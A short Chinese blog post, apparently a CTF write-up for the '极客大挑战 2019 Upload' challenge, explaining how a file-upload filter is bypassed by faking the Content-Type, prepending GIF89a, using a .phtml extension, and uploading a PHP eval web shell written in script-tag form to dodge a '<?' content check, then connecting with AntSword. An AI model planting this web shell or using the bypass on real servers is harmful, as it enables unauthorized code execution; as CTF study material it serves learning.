[极客大挑战 2019]Upload | php5.5绕过内容检查 |

打开题目,发现是一个完全的文件上传题:

先传一个php看看是前端还是后拦截,抓到包了,后端拦截:
image

想到校验,修改:
Content-Typt: image/png

加上GIF89a

再次上传php
image

尝试其它名字绕过:phtml

image
存在内容检测,查看响应发现,后端PHP版本为5.5.9

使用

<script language="php">
    @eval($_REQUEST['pass']);
</script>

PHP 5.x 中 可以被当作 PHP 代码执行,并且文件内容里不包含 <?,所以绕过了内容检测。

{{image.png(uploading

蚁剑连接:
image

image

posted @ 2026-08-18 22:21  Dragon_Roar  阅读(8)  评论(0)    收藏  举报